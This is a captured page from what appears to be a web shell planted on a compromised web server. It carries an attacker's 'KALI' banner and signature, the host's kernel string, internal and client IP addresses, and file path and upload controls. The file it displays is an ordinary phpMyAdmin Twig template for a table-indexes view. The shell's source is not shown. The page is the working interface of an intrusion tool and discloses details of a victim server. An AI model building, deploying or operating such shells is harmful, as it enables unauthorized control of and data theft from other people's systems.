~ K    A     L    I ~
UNAME : Linux web65.extendcp.co.uk 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
SERVER IP : 10.0.187.65 -________- CLIENT IP : 216.73.216.230
PATH :/home/phpmyadmin-www/templates/table/tracking/
UP FILE :
MINI SHELL D ZAB '
Current File : //home/phpmyadmin-www/templates/table/tracking/structure_snapshot_indexes.twig
<h3>{% trans 'Indexes' %}</h3>
<table id="tablestructure_indexes" class="table table-light table-striped table-hover">
    <thead class="table-light">
        <tr>
            <th>{% trans 'Keyname' %}</th>
            <th>{% trans 'Type' %}</th>
            <th>{% trans 'Unique' %}</th>
            <th>{% trans 'Packed' %}</th>
            <th>{% trans 'Column' %}</th>
            <th>{% trans 'Cardinality' %}</th>
            <th>{% trans 'Collation' %}</th>
            <th>{% trans 'Null' %}</th>
            <th>{% trans 'Comment' %}</th>
        </tr>
    </thead>
    <tbody>
        {% for index in indexes %}
            <tr class="noclick">
                <td>
                    <strong>{{ index['Key_name'] }}</strong>
                </td>
                <td>{{ index['Index_type'] }}</td>
                <td>{{ index['Non_unique'] == 0 ? 'Yes'|trans : 'No'|trans }}</td>
                <td>{{ index['Packed'] != '' ? 'Yes'|trans : 'No'|trans }}</td>
                <td>{{ index['Column_name'] }}</td>
                <td>{{ index['Cardinality'] }}</td>
                <td>{{ index['Collation'] }}</td>
                <td>{{ index['Null'] }}</td>
                <td>{{ index['Comment'] }}</td>
            </tr>
        {% endfor %}
    </tbody>
</table>
Coded by KALI :v Greetz to DR HARD ../ kali.zbi@hotmail.com